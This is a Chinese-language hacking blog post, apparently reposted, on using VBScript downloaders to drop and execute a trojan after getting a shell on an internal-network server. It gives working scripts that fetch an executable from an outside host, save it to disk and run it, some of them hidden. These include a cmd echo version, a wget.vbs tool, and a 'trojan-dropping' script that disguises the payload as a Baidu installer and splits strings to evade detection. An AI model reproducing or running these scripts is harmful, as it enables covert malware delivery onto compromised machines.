zoukankan      html  css  js  c++  java

  • VBS下载者助以一臂之力

    当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西

    是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望

     

    一、VBS下载者:

    复制代码 代码如下:


    Set Post = CreateObject("Msxml2.XMLHTTP")
    Set Shell = CreateObject("Wscript.Shell")
    Post.Open "GET","http://www.jbzj.com/muma.exe",0
    Post.Send()
    Set aGet = CreateObject("ADODB.Stream")
    aGet.Mode = 3
    aGet.Type = 1
    aGet.Open()
    aGet.Write(Post.responseBody)
    aGet.SaveToFile "c:zl.exe",2
    wscript.sleep 1000
    Shell.Run ("c:zl.exe") '延迟过后执行下载文件

    二、cmd下执行的版本:

    复制代码 代码如下:


    echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
    echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
    echo Post.Open "GET","http://www.jbzj.com/muma.exe",0 >>zl.vbs
    echo Post.Send() >>zl.vbs
    echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
    echo aGet.Mode = 3 >>zl.vbs
    echo aGet.Type = 1 >>zl.vbs
    echo aGet.Open() >>zl.vbs
    echo aGet.Write(Post.responseBody) >>zl.vbs
    echo aGet.SaveToFile "c:zl.exe",2 >>zl.vbs
    echo wscript.sleep 1000 >>zl.vbs
    echo Shell.Run ("c:zl.exe") >>zl.vbs

    三、wget.vbs

    复制代码 代码如下:


    on error resume next
    iLocal=LCase(Wscript.Arguments(1))
    iRemote=LCase(Wscript.Arguments(0))
    iUser=LCase(Wscript.Arguments(2))
    iPass=LCase(Wscript.Arguments(3))
    set xPost=CreateObject("Microsoft.XMLHTTP")
    if iUser="" and iPass="" then
    xPost.Open "GET",iRemote,0
    else
    xPost.Open "GET",iRemote,0,iUser,iPass
    end if
    xPost.Send()
    set sGet=CreateObject("ADODB.Stream")
    sGet.Mode=3
    sGet.Type=1
    sGet.Open()
    sGet.Write xPost.ResponseBody
    sGet.SaveToFile iLocal,2

    使用方法:cscript wget.vbs http://www.jbzj.com/muma.exe

    第一种是普通下载者,可能会被监控到,反正是我用它下载exe,每次都执行超时估计是被拦截了,但是它代码短小,能旋转~~,你可以用他下载其他的VBS

     

    列如 VBS传马病毒

    on error resume next

    iLocal=LCase(Wscript.Arguments(1))

    iRemote=LCase(Wscript.Arguments(0))

    iUser=LCase(Wscript.Arguments(2))

    iPass=LCase(Wscript.Arguments(3))

    set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")

    if iUser="" and iPass="" then

    xPost.Open "GET","http://www.dqsfjd.cn/bd.jpg",0

    else

    xPost.Open "GET",iRemote,0,iUser,iPass

    end if

    xPost.Send()

    set sGet=CreateObject("ADODB.Stream")

    sGet.Mode=3

    sGet.Type=1

    sGet.Open()

    sGet.Write xPost.ResponseBody

    sGet.SaveToFile "C:Baidusd_OnlineSetup_sid_30084_silent.exe",2

    Set objShell = CreateObject("Wscript.Shell")

    objShell.Run "C:Baidusd_OnlineSetup_sid_30084_silent.exe", 0

    Wscript.Sleep 1000

    on error resume next

    iLocal=LCase(Wscript.Arguments(1))

    iRemote=LCase(Wscript.Arguments(0))

    iUser=LCase(Wscript.Arguments(2))

    iPass=LCase(Wscript.Arguments(3))

    set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")

    这段代码是将bd.jpg下载并保存为C:Baidusd_OnlineSetup_sid_30084_silent.exe,然后执行

    使用方法 cscript c:xia.vbs

    此段代码执行成功率高,

    实验证明VBS传马病毒,CMD命令echo保存时不行的,所以就要用到。vbs下载者把VBS传马病毒下载到服务器上


      
  • 相关阅读:
    UVA1585
    暑期第二场-1
    UVA11582
    UVA10006
    HDU1005
    HDU2035
    POJ:2492-Bug's Life(二分图的判定)
    Codeforces:68A-Irrational problem(暴力大法好)
    Codeforces Round #456 (Div. 2) B. New Year's Eve
    Codeforces Round #456 (Div. 2) A. Tricky Alchemy
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154601.html
Copyright © 2011-2022 走看看